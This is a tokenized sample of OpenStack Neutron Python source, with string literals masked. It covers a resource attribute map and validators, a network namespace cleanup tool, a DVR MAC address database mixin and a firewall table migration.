'<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : <EOL> lib_converters . convert_kvp_list_to_dict , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : DEVICE_ID_MAX_LEN } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : DEVICE_OWNER_MAX_LEN } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT:status>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> } , <EOL> SUBNETS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : NAME_MAX_LEN } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ <NUM_LIT:4> , <NUM_LIT:6> ] } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> lib_converters . convert_none_to_empty_list , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <EOL> lib_converters . convert_none_to_empty_list , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : n_const . IPV6_MODES } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> n_const . IPV6_MODES } , <EOL> '<STR_LIT>' : True } , <EOL> SHARED : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> } , <EOL> SUBNETPOOLS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : lib_converters . convert_to_int , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> SHARED : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> } <EOL> } <EOL> RESOURCE_FOREIGN_KEYS = { <EOL> NETWORKS : '<STR_LIT>' <EOL> } <EOL> PLURALS = { NETWORKS : NETWORK , <EOL> PORTS : PORT , <EOL> SUBNETS : SUBNET , <EOL> SUBNETPOOLS : SUBNETPOOL , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> REVERSED_PLURALS = { } <EOL> def get_collection_info ( collection ) : <EOL> """<STR_LIT>""" <EOL> return RESOURCE_ATTRIBUTE_MAP . get ( collection ) <EOL> def get_resource_info ( resource ) : <EOL> """<STR_LIT>""" <EOL> plural_name = REVERSED_PLURALS . get ( resource ) <EOL> if not plural_name : <EOL> for ( plural , singular ) in PLURALS . items ( ) : <EOL> if singular == resource : <EOL> plural_name = plural <EOL> REVERSED_PLURALS [ resource ] = plural_name <EOL> return RESOURCE_ATTRIBUTE_MAP . get ( plural_name ) <EOL> def fill_default_value ( attr_info , res_dict , <EOL> exc_cls = ValueError , <EOL> check_allow_post = True ) : <EOL> for attr , attr_vals in six . iteritems ( attr_info ) : <EOL> if attr_vals [ '<STR_LIT>' ] : <EOL> if '<STR_LIT:default>' not in attr_vals and attr not in res_dict : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % attr <EOL> raise exc_cls ( msg ) <EOL> res_dict [ attr ] = res_dict . get ( attr , <EOL> attr_vals . get ( '<STR_LIT:default>' ) ) <EOL> elif check_allow_post : <EOL> if attr in res_dict : <EOL> msg = _ ( "<STR_LIT>" ) % attr <EOL> raise exc_cls ( msg ) <EOL> def convert_value ( attr_info , res_dict , exc_cls = ValueError ) : <EOL> for attr , attr_vals in six . iteritems ( attr_info ) : <EOL> if ( attr not in res_dict or <EOL> res_dict [ attr ] is constants . ATTR_NOT_SPECIFIED ) : <EOL> continue <EOL> if '<STR_LIT>' in attr_vals : <EOL> res_dict [ attr ] = attr_vals [ '<STR_LIT>' ] ( res_dict [ attr ] ) <EOL> if '<STR_LIT>' not in attr_vals : <EOL> continue <EOL> for rule in attr_vals [ '<STR_LIT>' ] : <EOL> res = lib_validators . validators [ rule ] ( res_dict [ attr ] , <EOL> attr_vals [ '<STR_LIT>' ] [ rule ] ) <EOL> if res : <EOL> msg_dict = dict ( attr = attr , reason = res ) <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % msg_dict <EOL> raise exc_cls ( msg ) <EOL> def populate_tenant_id ( context , res_dict , attr_info , is_create ) : <EOL> if ( ( '<STR_LIT>' in res_dict and <EOL> res_dict [ '<STR_LIT>' ] != context . tenant_id and <EOL> not context . is_admin ) ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise webob . exc . HTTPBadRequest ( msg ) <EOL> if is_create and '<STR_LIT>' not in res_dict : <EOL> if context . tenant_id : <EOL> res_dict [ '<STR_LIT>' ] = context . tenant_id <EOL> elif '<STR_LIT>' in attr_info : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise webob . exc . HTTPBadRequest ( msg ) <EOL> def verify_attributes ( res_dict , attr_info ) : <EOL> extra_keys = set ( res_dict . keys ( ) ) - set ( attr_info . keys ( ) ) <EOL> if extra_keys : <EOL> msg = _ ( "<STR_LIT>" ) % '<STR_LIT:U+002CU+0020>' . join ( extra_keys ) <EOL> raise webob . exc . HTTPBadRequest ( msg ) <EOL> _OLD_REF = sys . modules [ __name__ ] <EOL> sys . modules [ __name__ ] = _deprecate . _DeprecateSubset ( globals ( ) , constants ) </s>
<s> import itertools <EOL> import re <EOL> import time <EOL> from neutron_lib import constants <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import importutils <EOL> from neutron . _i18n import _ , _LE <EOL> from neutron . agent . common import config as agent_config <EOL> from neutron . agent . common import ovs_lib <EOL> from neutron . agent . dhcp import config as dhcp_config <EOL> from neutron . agent . l3 import agent as l3_agent <EOL> from neutron . agent . l3 import dvr <EOL> from neutron . agent . l3 import dvr_fip_ns <EOL> from neutron . agent . linux import dhcp <EOL> from neutron . agent . linux import external_process <EOL> from neutron . agent . linux import interface <EOL> from neutron . agent . linux import ip_lib <EOL> from neutron . common import config <EOL> LOG = logging . getLogger ( __name__ ) <EOL> LB_NS_PREFIX = '<STR_LIT>' <EOL> NS_PREFIXES = { <EOL> '<STR_LIT>' : [ dhcp . NS_PREFIX ] , <EOL> '<STR_LIT>' : [ l3_agent . NS_PREFIX , dvr . SNAT_NS_PREFIX , dvr_fip_ns . FIP_NS_PREFIX ] , <EOL> '<STR_LIT>' : [ LB_NS_PREFIX ] , <EOL> } <EOL> class FakeDhcpPlugin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __getattribute__ ( self , name ) : <EOL> def fake_method ( * args ) : <EOL> pass <EOL> return fake_method <EOL> def setup_conf ( ) : <EOL> """<STR_LIT>""" <EOL> cli_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = _ ( '<STR_LIT>' ) ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help = _ ( '<STR_LIT>' ) ) , <EOL> ] <EOL> conf = cfg . CONF <EOL> conf . register_cli_opts ( cli_opts ) <EOL> agent_config . register_interface_driver_opts_helper ( conf ) <EOL> conf . register_opts ( dhcp_config . DHCP_AGENT_OPTS ) <EOL> conf . register_opts ( dhcp_config . DHCP_OPTS ) <EOL> conf . register_opts ( dhcp_config . DNSMASQ_OPTS ) <EOL> conf . register_opts ( interface . OPTS ) <EOL> return conf <EOL> def _get_dhcp_process_monitor ( config ) : <EOL> return external_process . ProcessMonitor ( config = config , <EOL> resource_type = '<STR_LIT>' ) <EOL> def kill_dhcp ( conf , namespace ) : <EOL> """<STR_LIT>""" <EOL> network_id = namespace . replace ( dhcp . NS_PREFIX , '<STR_LIT>' ) <EOL> dhcp_driver = importutils . import_object ( <EOL> conf . dhcp_driver , <EOL> conf = conf , <EOL> process_monitor = _get_dhcp_process_monitor ( conf ) , <EOL> network = dhcp . NetModel ( { '<STR_LIT:id>' : network_id } ) , <EOL> plugin = FakeDhcpPlugin ( ) ) <EOL> if dhcp_driver . active : <EOL> dhcp_driver . disable ( ) <EOL> def eligible_for_deletion ( conf , namespace , force = False ) : <EOL> """<STR_LIT>""" <EOL> if conf . agent_type : <EOL> prefixes = NS_PREFIXES . get ( conf . agent_type ) <EOL> else : <EOL> prefixes = itertools . chain ( * NS_PREFIXES . values ( ) ) <EOL> ns_mangling_pattern = '<STR_LIT>' % ( '<STR_LIT:|>' . join ( prefixes ) , <EOL> constants . UUID_PATTERN ) <EOL> if not re . match ( ns_mangling_pattern , namespace ) : <EOL> return False <EOL> ip = ip_lib . IPWrapper ( namespace = namespace ) <EOL> return force or ip . namespace_is_empty ( ) <EOL> def unplug_device ( conf , device ) : <EOL> orig_log_fail_as_error = device . get_log_fail_as_error ( ) <EOL> device . set_log_fail_as_error ( False ) <EOL> try : <EOL> device . link . delete ( ) <EOL> except RuntimeError : <EOL> device . set_log_fail_as_error ( orig_log_fail_as_error ) <EOL> ovs = ovs_lib . BaseOVS ( ) <EOL> bridge_name = ovs . get_bridge_for_iface ( device . name ) <EOL> if bridge_name : <EOL> bridge = ovs_lib . OVSBridge ( bridge_name ) <EOL> bridge . delete_port ( device . name ) <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' , device . name ) <EOL> finally : <EOL> device . set_log_fail_as_error ( orig_log_fail_as_error ) <EOL> def destroy_namespace ( conf , namespace , force = False ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ip = ip_lib . IPWrapper ( namespace = namespace ) <EOL> if force : <EOL> kill_dhcp ( conf , namespace ) <EOL> if ip . netns . exists ( namespace ) : <EOL> for device in ip . get_devices ( exclude_loopback = True ) : <EOL> unplug_device ( conf , device ) <EOL> ip . garbage_collect_namespace ( ) <EOL> except Exception : <EOL> LOG . exception ( _LE ( '<STR_LIT>' ) , namespace ) <EOL> def cleanup_network_namespaces ( conf ) : <EOL> candidates = [ ns for ns in <EOL> ip_lib . IPWrapper . get_namespaces ( ) <EOL> if eligible_for_deletion ( conf , ns , conf . force ) ] <EOL> if candidates : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> for namespace in candidates : <EOL> destroy_namespace ( conf , namespace , conf . force ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> conf = setup_conf ( ) <EOL> conf ( ) <EOL> config . setup_logging ( ) <EOL> cleanup_network_namespaces ( conf ) </s>
<s> from neutron_lib import constants <EOL> from neutron_lib import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_db import exception as db_exc <EOL> from oslo_log import helpers as log_helpers <EOL> from oslo_log import log as logging <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import or_ <EOL> from sqlalchemy . orm import exc <EOL> from neutron . _i18n import _ , _LE <EOL> from neutron . callbacks import events <EOL> from neutron . callbacks import registry <EOL> from neutron . callbacks import resources <EOL> from neutron . common import utils <EOL> from neutron . db import model_base <EOL> from neutron . db import models_v2 <EOL> from neutron . extensions import dvr as ext_dvr <EOL> from neutron . extensions import portbindings <EOL> from neutron import manager <EOL> LOG = logging . getLogger ( __name__ ) <EOL> dvr_mac_address_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> help = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) , <EOL> ] <EOL> cfg . CONF . register_opts ( dvr_mac_address_opts ) <EOL> class DistributedVirtualRouterMacAddress ( model_base . BASEV2 ) : <EOL> """<STR_LIT>""" <EOL> __tablename__ = '<STR_LIT>' <EOL> host = sa . Column ( sa . String ( <NUM_LIT:255> ) , primary_key = True , nullable = False ) <EOL> mac_address = sa . Column ( sa . String ( <NUM_LIT:32> ) , nullable = False , unique = True ) <EOL> def _delete_mac_associated_with_agent ( resource , event , trigger , context , agent , <EOL> ** kwargs ) : <EOL> host = agent [ '<STR_LIT:host>' ] <EOL> plugin = manager . NeutronManager . get_plugin ( ) <EOL> if [ a for a in plugin . get_agents ( context , filters = { '<STR_LIT:host>' : [ host ] } ) <EOL> if a [ '<STR_LIT:id>' ] != agent [ '<STR_LIT:id>' ] ] : <EOL> return <EOL> try : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> entry = ( context . session . query ( DistributedVirtualRouterMacAddress ) . <EOL> filter ( DistributedVirtualRouterMacAddress . host == host ) . <EOL> one ( ) ) <EOL> context . session . delete ( entry ) <EOL> except exc . NoResultFound : <EOL> return <EOL> dvr_macs = plugin . get_dvr_mac_address_list ( context ) <EOL> plugin . notifier . dvr_mac_address_update ( context , dvr_macs ) <EOL> class DVRDbMixin ( ext_dvr . DVRMacAddressPluginBase ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> registry . subscribe ( _delete_mac_associated_with_agent , <EOL> resources . AGENT , events . BEFORE_DELETE ) <EOL> return super ( DVRDbMixin , cls ) . __new__ ( cls ) <EOL> @ property <EOL> def plugin ( self ) : <EOL> try : <EOL> if self . _plugin is not None : <EOL> return self . _plugin <EOL> except AttributeError : <EOL> pass <EOL> self . _plugin = manager . NeutronManager . get_plugin ( ) <EOL> return self . _plugin <EOL> def _get_dvr_mac_address_by_host ( self , context , host ) : <EOL> try : <EOL> query = context . session . query ( DistributedVirtualRouterMacAddress ) <EOL> dvrma = query . filter ( <EOL> DistributedVirtualRouterMacAddress . host == host ) . one ( ) <EOL> except exc . NoResultFound : <EOL> raise ext_dvr . DVRMacAddressNotFound ( host = host ) <EOL> return dvrma <EOL> def _create_dvr_mac_address ( self , context , host ) : <EOL> """<STR_LIT>""" <EOL> base_mac = cfg . CONF . dvr_base_mac . split ( '<STR_LIT::>' ) <EOL> max_retries = cfg . CONF . mac_generation_retries <EOL> for attempt in reversed ( range ( max_retries ) ) : <EOL> try : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> mac_address = utils . get_random_mac ( base_mac ) <EOL> dvr_mac_binding = DistributedVirtualRouterMacAddress ( <EOL> host = host , mac_address = mac_address ) <EOL> context . session . add ( dvr_mac_binding ) <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:host>' : host , '<STR_LIT>' : mac_address } ) <EOL> dvr_macs = self . get_dvr_mac_address_list ( context ) <EOL> self . notifier . dvr_mac_address_update ( context , dvr_macs ) <EOL> return self . _make_dvr_mac_address_dict ( dvr_mac_binding ) <EOL> except db_exc . DBDuplicateEntry : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : mac_address , '<STR_LIT>' : attempt } ) <EOL> LOG . error ( _LE ( "<STR_LIT>" ) , max_retries ) <EOL> raise ext_dvr . MacAddressGenerationFailure ( host = host ) <EOL> def get_dvr_mac_address_list ( self , context ) : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> return ( context . session . <EOL> query ( DistributedVirtualRouterMacAddress ) . all ( ) ) <EOL> def get_dvr_mac_address_by_host ( self , context , host ) : <EOL> """<STR_LIT>""" <EOL> if not host : <EOL> return <EOL> try : <EOL> return self . _get_dvr_mac_address_by_host ( context , host ) <EOL> except ext_dvr . DVRMacAddressNotFound : <EOL> return self . _create_dvr_mac_address ( context , host ) <EOL> def _make_dvr_mac_address_dict ( self , dvr_mac_entry , fields = None ) : <EOL> return { '<STR_LIT:host>' : dvr_mac_entry [ '<STR_LIT:host>' ] , <EOL> '<STR_LIT>' : dvr_mac_entry [ '<STR_LIT>' ] } <EOL> @ log_helpers . log_method_call <EOL> def get_ports_on_host_by_subnet ( self , context , host , subnet ) : <EOL> """<STR_LIT>""" <EOL> filters = { '<STR_LIT>' : { '<STR_LIT>' : [ subnet ] } , <EOL> portbindings . HOST_ID : [ host ] } <EOL> ports_query = self . plugin . _get_ports_query ( context , filters = filters ) <EOL> owner_filter = or_ ( <EOL> models_v2 . Port . device_owner . startswith ( <EOL> constants . DEVICE_OWNER_COMPUTE_PREFIX ) , <EOL> models_v2 . Port . device_owner . in_ ( <EOL> utils . get_other_dvr_serviced_device_owners ( ) ) ) <EOL> ports_query = ports_query . filter ( owner_filter ) <EOL> ports = [ <EOL> self . plugin . _make_port_dict ( port , process_extensions = False ) <EOL> for port in ports_query . all ( ) <EOL> ] <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:host>' : host , '<STR_LIT>' : subnet , <EOL> '<STR_LIT>' : ports } ) <EOL> return ports <EOL> @ log_helpers . log_method_call <EOL> def get_subnet_for_dvr ( self , context , subnet , fixed_ips = None ) : <EOL> if fixed_ips : <EOL> subnet_data = fixed_ips [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> else : <EOL> subnet_data = subnet <EOL> try : <EOL> subnet_info = self . plugin . get_subnet ( <EOL> context , subnet_data ) <EOL> except n_exc . SubnetNotFound : <EOL> return { } <EOL> else : <EOL> if fixed_ips : <EOL> ip_address = fixed_ips [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> else : <EOL> ip_address = subnet_info [ '<STR_LIT>' ] <EOL> filter = { '<STR_LIT>' : { '<STR_LIT>' : [ subnet ] , <EOL> '<STR_LIT>' : [ ip_address ] } } <EOL> internal_gateway_ports = self . plugin . get_ports ( <EOL> context , filters = filter ) <EOL> if not internal_gateway_ports : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , subnet_info ) <EOL> return { } <EOL> internal_port = internal_gateway_ports [ <NUM_LIT:0> ] <EOL> subnet_info [ '<STR_LIT>' ] = internal_port [ '<STR_LIT>' ] <EOL> return subnet_info </s>
<s> from alembic import op <EOL> import sqlalchemy as sa <EOL> action_types = sa . Enum ( '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> def upgrade ( ) : <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) ) <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:status>' , sa . String ( length = <NUM_LIT:16> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , <EOL> name = '<STR_LIT>' ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) ) <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:action>' , action_types , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , <EOL> name = '<STR_LIT>' ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) ) </s>
